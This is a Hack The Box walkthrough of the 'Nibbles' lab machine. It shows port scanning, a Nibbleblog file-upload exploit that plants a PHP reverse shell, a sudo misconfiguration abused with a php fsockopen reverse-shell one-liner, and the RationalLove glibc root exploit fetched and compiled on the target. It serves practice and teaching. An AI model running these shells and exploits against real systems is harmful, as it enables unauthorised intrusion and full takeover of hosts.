Nibbles

Back

Ports scan

masscan

root@kali:~/HTB/Machines/Nibbles# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.75 --rate=1000


Starting masscan 1.0.5 at 2019-11-26 14:25:41 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.75
Discovered open port 22/tcp on 10.10.10.75

nmap

root@kali:~/HTB/Machines/Nibbles# nmap -A -T4 -v 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 23:13 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating Ping Scan at 23:13
Scanning 10.10.10.75 [4 ports]
Completed Ping Scan at 23:13, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:13
Scanning nibbles.htb (10.10.10.75) [1000 ports]
Discovered open port 22/tcp on 10.10.10.75
Discovered open port 80/tcp on 10.10.10.75
Completed SYN Stealth Scan at 23:13, 0.68s elapsed (1000 total ports)
Initiating Service scan at 23:13
Scanning 2 services on nibbles.htb (10.10.10.75)
Completed Service scan at 23:13, 6.10s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against nibbles.htb (10.10.10.75)
adjust_timeouts2: packet supposedly had rtt of -942494 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -942494 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1137146 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1137146 microseconds.  Ignoring time.
Retrying OS detection (try #2) against nibbles.htb (10.10.10.75)
Retrying OS detection (try #3) against nibbles.htb (10.10.10.75)
adjust_timeouts2: packet supposedly had rtt of -750731 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -750731 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -560377 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -560377 microseconds.  Ignoring time.
Retrying OS detection (try #4) against nibbles.htb (10.10.10.75)
Retrying OS detection (try #5) against nibbles.htb (10.10.10.75)
adjust_timeouts2: packet supposedly had rtt of -258685 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258685 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258563 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258563 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -257913 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -257913 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -508716 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -508716 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -508817 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -508817 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -784778 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -784778 microseconds.  Ignoring time.
Initiating Traceroute at 23:13
Completed Traceroute at 23:13, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 23:13
Completed Parallel DNS resolution of 2 hosts. at 23:13, 0.21s elapsed
NSE: Script scanning 10.10.10.75.
Initiating NSE at 23:13
Completed NSE at 23:13, 1.50s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.17s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Nmap scan report for nibbles.htb (10.10.10.75)
Host is up (0.045s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/25%OT=22%CT=1%CU=43620%PV=Y%DS=2%DC=T%G=Y%TM=5DDCA6
OS:79%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%TS=8)SEQ(SP=
OS:FC%GCD=1%ISR=105%TI=Z%TS=9)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)
OS:OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54D
OS:ST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
OS:ECN(R=Y%DF=Y%TG=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)ECN(R=Y%DF=Y%T=40%W=7210%
OS:O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T
OS:G=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=O%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:7(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=40%IPL=
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%TG=40%CD=S)IE(R=
OS:Y%DFI=N%T=40%CD=S)


Uptime guess: 49.710 days (since Mon Oct  7 07:11:16 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   42.81 ms 10.10.14.1
2   42.90 ms nibbles.htb (10.10.10.75)


NSE: Script Post-scanning.
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.19 seconds
           Raw packets sent: 1255 (67.442KB) | Rcvd: 4498 (186.062KB)

Web Enumeration

root@kali:~/HTB/Machines/Nibbles# curl http://10.10.10.75
Hello world!


<!-- /nibbleblog/ directory. Nothing interesting here! -->

First page doesn't provide much information, but a comment tell us to take a look at /nibbleblog/ directory.

On the mentioned directory, we find a blog powered by Nibbleblog.

Dirsearch

root@kali:~/HTB/Machines/Nibbles# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://10.10.10.75/nibbleblog/


 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )


Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562


Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-25_23-21-22.log


Target: http://10.10.10.75/nibbleblog/


[23:21:22] Starting:
[23:21:23] 403 -  301B  - /nibbleblog/.php
[23:21:24] 200 -    4KB - /nibbleblog/plugins/
[23:21:26] 200 -   78B  - /nibbleblog/install.php
[23:21:26] 200 -    2KB - /nibbleblog/update.php
[23:21:26] 200 -  401B  - /nibbleblog/sitemap.php
[23:21:26] 200 -    3KB - /nibbleblog/languages/
[23:21:28] 200 -    2KB - /nibbleblog/admin/
[23:21:28] 200 -    3KB - /nibbleblog/index.php
[23:21:28] 200 -    1KB - /nibbleblog/content/
[23:21:29] 200 -  300B  - /nibbleblog/feed.php
[23:21:30] 200 -    1KB - /nibbleblog/admin.php
[23:21:32] 200 -    2KB - /nibbleblog/themes/
[23:21:35] 200 -   34KB - /nibbleblog/LICENSE.txt
[23:22:35] 200 -    1KB - /nibbleblog/COPYRIGHT.txt


Task Completed

Dirbuster

With dirbuster, we can enumerate, a lot of files.

Search exploit

root@kali:~/HTB/Machines/Nibbles# searchsploit nibble
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Nibbleblog 3 - Multiple SQL Injections | exploits/php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Uplo | exploits/php/remote/38489.rb
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

The file upload seems very interesting. There a Metasploit module, but the information given by Tim Coen of Curesec GmbH of the bug is even better, and we can exploit the machine manually. But we need a valid user to login on the application.

Web access

With dibuster, we can find an interresting file /nibbleblog/content/private/users.xml

But this file enumerates only the username. Admin.

There is a black list protection so we cannot brute force the admin web page. The only way is to guess the password. In this case credentials admin/nibbles works.

Gain shell access to the server

On Tim's page, he explains how to upload a php file to the server, and execute it after. The exploit is to upload a reverse shell in php and gain access to the server.

Open listener

root@kali:~/HTB/Machines/Nibbles# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Create the reverse shell file

root@kali:~/HTB/Machines/Nibbles# cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php
root@kali:~/HTB/Machines/Nibbles# vi rs.php
root@kali:~/HTB/Machines/Nibbles# grep CHANGE rs.php
$ip = '10.10.14.34';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

Upload the reverse shell file

Run the reverse shell

Browse to folder /nibbleblog/content/private/plugins/my_image

To run the rs, you can click on the link or launch a cURL command.

root@kali:~/HTB/Machines/Nibbles# curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

The rs is opened

root@kali:~/HTB/Machines/Nibbles# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.75.
Ncat: Connection from 10.10.10.75:50112.
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 11:31:07 up  2:07,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler

User flag

$ cat /home/nibbler/user.txt
<USER_FLAG>

User escalation

On the first check, we can see that user nibbles can execute commands as root on a specific file.

$ sudo -l


sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin


User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

The file doesn't exist.

$ ls -l /home/nibbler/personal/stuff/monitor.sh
ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory

Open listener

root@kali:~/HTB/Machines/Nibbles# rlwrap nc -nvlp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555

Create script file

We create a script file that opens a reverse shell.

$ mkdir -p /home/nibbler/personal/stuff/
$ echo "php -r '\$sock=fsockopen(\"10.10.14.34\",5555);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" > /home/nibbler/personal/stuff/monitor.sh
$ chmod +x /home/nibbler/personal/stuff/monitor.sh
$ cat /home/nibbler/personal/stuff/monitor.sh
php -r '$sock=fsockopen("10.10.14.34",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

Run script

$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out

On the listener

root@kali:~/HTB/Machines/Nibbles# rlwrap nc -nvlp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.75.
Ncat: Connection from 10.10.10.75:50154.
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

User escalation (easier alternative way)

On the first check, we can see that user nibbles can execute commands as root on a specific file.

$ sudo -l


sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin


User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

The file doesn't exist.

$ ls -l /home/nibbler/personal/stuff/monitor.sh
ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory

Create script file

We create a script file that opens a reverse shell.

$ mkdir -p /home/nibbler/personal/stuff/
$ echo "bash" > /home/nibbler/personal/stuff/monitor.sh
$ chmod +x /home/nibbler/personal/stuff/monitor.sh
$ cat /home/nibbler/personal/stuff/monitor.sh
bash

Run script

$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
whoami
root

User escalation (harder alternative way)

We can try to find a local exploit on the machine.

Upload LES (Linux exploit suggester script)

root@kali:~/HTB/Machines/Nibbles# cp ../../Utils/linux-exploit-suggester/linux-exploit-suggester.sh ./
root@kali:~/HTB/Machines/Nibbles# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ... 

From the reverse shell.

$ cd /tmp
$ wget -q http://10.10.14.34/linux-exploit-suggester.sh
$ chmod +x linux-exploit-suggester.sh

Run LES

$ ./linux-exploit-suggester.sh


Available information:


Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS


Searching among:


72 kernel space exploits
42 user space exploits


Possible Exploits:


cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2017-16995] eBPF_verifier


   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1


[+] [CVE-2016-5195] dirtycow


   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh


[+] [CVE-2016-5195] dirtycow 2


   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh


[+] [CVE-2017-7308] af_packet


   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels


[+] [CVE-2017-6074] dccp


   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass


[+] [CVE-2017-1000112] NETIF_F_UFO


   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels


[+] [CVE-2016-8655] chocobo_root


   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled


[+] [CVE-2016-4557] double-fdput()


   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.4.0-(21|38|42|98|140)-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1


[+] [CVE-2018-1000001] RationalLove


   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required


[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64


   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries


[+] [CVE-2017-1000253] PIE_stack_corruption


   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c


[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE


   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only


[+] [CVE-2016-2384] usb-midi


   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user


[+] [CVE-2016-0728] keyring


   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working

Check requisites

$ lsb_release -a
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.3 LTS
Release:        16.04
Codename:       xenial
No LSB modules are available.

Correct version of OS (Ubuntu 16.04.3).

$ ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu9) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Glibc seems to be correct.

Upload the exploit

root@kali:~/HTB/Machines/Nibbles# wget -q https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c

Check our Web server is still open.

root@kali:~/HTB/Machines/Nibbles# python -m SimpleHTTPServer 80                 
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.75 - - [27/Nov/2019 07:57:53] "GET /linux-exploit-suggester.sh HTTP/1.1" 200 -

Download the file from the target

$ wget -q http://10.10.14.34/RationalLove.c

Compile the exploit

Compile the exploit on the target.

$ gcc -o RationalLove RationalLove.c

Run the exploit

$ ./RationalLove
./RationalLove: setting up environment ...
Detected OS version: "16.04.3 LTS (Xenial Xerus)"
./RationalLove: using umount at "/bin/umount".
No pid supplied via command line, trying to create a namespace
CAVEAT: /proc/sys/kernel/unprivileged_userns_clone must be 1 on systems with USERNS protection.
Namespaced filesystem created with pid 22110
Attempting to gain root, try 1 of 10 ...
Starting subprocess
Stack content received, calculating next phase
Found source address location 0x7ffe7d16eda8 pointing to target address 0x7ffe7d16ee78 with value 0x7ffe7d171221, libc offset is 0x7ffe7d16ed98
Changing return address from 0x7f7e2aa5e830 to 0x7f7e2aafde00, 0x7f7e2ab0aa20
Using escalation string %69$hn%73$hn%1$10927.10927s%67$hn%1$1.1s%71$hn%1$21710.21710s%68$hn%72$hn%1$10914.10914s%70$hn%1$13280.13280s%66$hn%1$8704.8704s%1$60806.60806s%1$s%1$s%65$hn%1$s%1$s%1$s%1$s%1$s%1$s%1$186.186s%39$hn-%35$lx-%39$lx-%64$lx-%65$lx-%66$lx-%67$lx-%68$lx-%69$lx-%70$lx-%71$lx-%78$s
Attempting to gain root, try 2 of 10 ...
Starting subprocess
Stack content received, calculating next phase
Found source address location 0x7fffb71c8d98 pointing to target address 0x7fffb71c8e68 with value 0x7fffb71ca221, libc offset is 0x7fffb71c8d88
Changing return address from 0x7f059215a830 to 0x7f05921f9e00, 0x7f0592206a20
Using escalation string %69$hn%73$hn%1$27168.27168s%70$hn%1$5349.5349s%68$hn%72$hn%1$4890.4890s%67$hn%1$1.1s%71$hn%1$3040.3040s%66$hn%1$25088.25088s%1$36214.36214s%1$s%1$s%65$hn%1$s%1$s%1$s%1$s%1$s%1$s%1$186.186s%39$hn-%35$lx-%39$lx-%64$lx-%65$lx-%66$lx-%67$lx-%68$lx-%69$lx-%70$lx-%71$lx-%78$s
Executable now root-owned
Cleanup completed, re-invoking binary
/proc/self/exe: invoked as SUID, invoking shell ...
whoami
root

Root Flag

# cat /root/root.txt
<ROOT_FLAG>

References

• NibbleBlog 4.0.3 Shell Upload
• LES: Linux privilege escalation auditing tool
• Libc Real path Buffer Underflow

Daniel Simao 07:18, 26 November 2019 (EST)